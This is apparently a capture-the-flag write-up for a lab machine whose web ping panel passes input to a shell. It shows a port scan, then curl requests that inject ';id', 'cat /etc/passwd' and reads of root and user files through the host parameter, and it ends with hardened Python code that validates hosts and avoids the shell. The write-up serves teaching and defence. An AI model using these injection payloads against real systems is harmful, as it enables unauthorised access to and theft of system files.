VoltCore
Premium Machine (Locked)
VoltCore's network diagnostics panel passes your input straight to ping. The sudo policy for the next hop is generous. Two steps to root.
RatCTF
Challenge Description:
An internal power-grid dashboard includes a network diagnostics panel. The developers claim it is safe, but user input is passed directly to the system ping utility. Find a path from the web application to root.
An initial scan reveals two open ports:
nmap -sV -p 30608,30609 23.92.29.178
Output:
30608/tcp open ssh OpenSSH 8.2p1 Ubuntu
30609/tcp open http BaseHTTPServer 0.6 (Python 3.8.10)
The challenge description references a diagnostics panel, making the HTTP service the primary target.
Browsing the application reveals a management portal:
curl http://23.92.29.178:30609
The page contains a link to:
/diag
Opening the diagnostics page shows a ping utility:
<form method="get" action="/diag">
<input name="host">
</form>
The application accepts a hostname or IP address and returns the output of a ping command.
Because the challenge description states that input is passed directly to ping, command injection is tested using a command separator:
curl "http://23.92.29.178:30609/diag?host=127.0.0.1;id"
Response:
uid=0(root) gid=0(root) groups=0(root)
This confirms:
Determine available users:
curl "http://23.92.29.178:30609/diag?host=127.0.0.1;cat /etc/passwd"
Interesting account discovered:
volt:x:1000:1000::/home/volt:/bin/bash
List the user and root directories:
curl "http://23.92.29.178:30609/diag?host=127.0.0.1;ls -la /home/volt;/bin/echo ---ROOT---;ls -la /root"
Output reveals:
/home/volt/user.txt
/root/root.txt
Additional files:
/home/volt/notes.txt
/home/volt/readme.txt
Reading the note:
curl "http://23.92.29.178:30609/diag?host=127.0.0.1;cat /home/volt/notes.txt"
Output:
Helpdesk approved vim for log review. Do NOT share sudo password.
This suggests the intended privilege escalation path likely involved a sudo-enabled vim binary.
Read both flag files:
curl "http://23.92.29.178:30609/diag?host=127.0.0.1;cat /home/volt/user.txt;/bin/echo ---ROOT---;cat /root/root.txt"
Output:
flag{...._...._...}
---ROOT---
flag{...._...._...}
The vulnerability was a classic OS command injection in the diagnostics panel. User-supplied input was passed directly to the ping command without sanitization. Injected commands executed with root privileges, allowing immediate access to sensitive files and complete compromise of the host.
The root flag indicates the intended path likely involved obtaining access as the volt user and exploiting a sudo vim configuration to escalate privileges, but the web application itself was already running commands as root, making direct compromise possible.
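The fix for the diagnostics handler, as an added example that is not the challenge's own source: the page does not show the server code, so `vulnerable_command` is an assumed reconstruction of the flaw, and `validate_host`, `build_ping_argv` and `run_diag` are hypothetical names. The hardened path validates the `host` parameter as an IP literal or hostname and runs ping from an argument list with no shell.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: letters, digits, hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

def vulnerable_command(host):
    # Assumed shape of the flaw: this string is handed to a shell (shell=True),
    # so "127.0.0.1;id" is parsed as two commands.
    return f"ping -c 1 {host}"

def validate_host(value):
    """Return value if it is an IP literal or a hostname, else raise ValueError."""
    if not value or len(value) > 253:
        raise ValueError("empty or over-long host")
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass
    if all(_LABEL.fullmatch(label) for label in value.split(".")):
        return value
    raise ValueError("not an IP address or hostname")

def build_ping_argv(host):
    # Argument list, no shell: separators and substitutions are never interpreted.
    # "--" ends option parsing, a second guard against values starting with "-".
    return ["ping", "-c", "1", "-W", "2", "--", validate_host(host)]

def run_diag(host):
    """Return (HTTP status, body) for one diagnostics request."""
    try:
        argv = build_ping_argv(host)
    except ValueError as exc:
        return 400, f"rejected: {exc}"
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired) as exc:
        return 502, f"ping failed: {type(exc).__name__}"
    return 200, proc.stdout

if __name__ == "__main__":
    # Constructed inputs: benign values, one payload from the write-up, one option-style value.
    for sample in ["127.0.0.1", "::1", "grid.example", "127.0.0.1;id", "-f"]:
        print(repr(sample), "->", run_diag(sample)[0])
```

Input validation closes the injection; running the web service under an unprivileged account rather than root limits what any remaining flaw can reach.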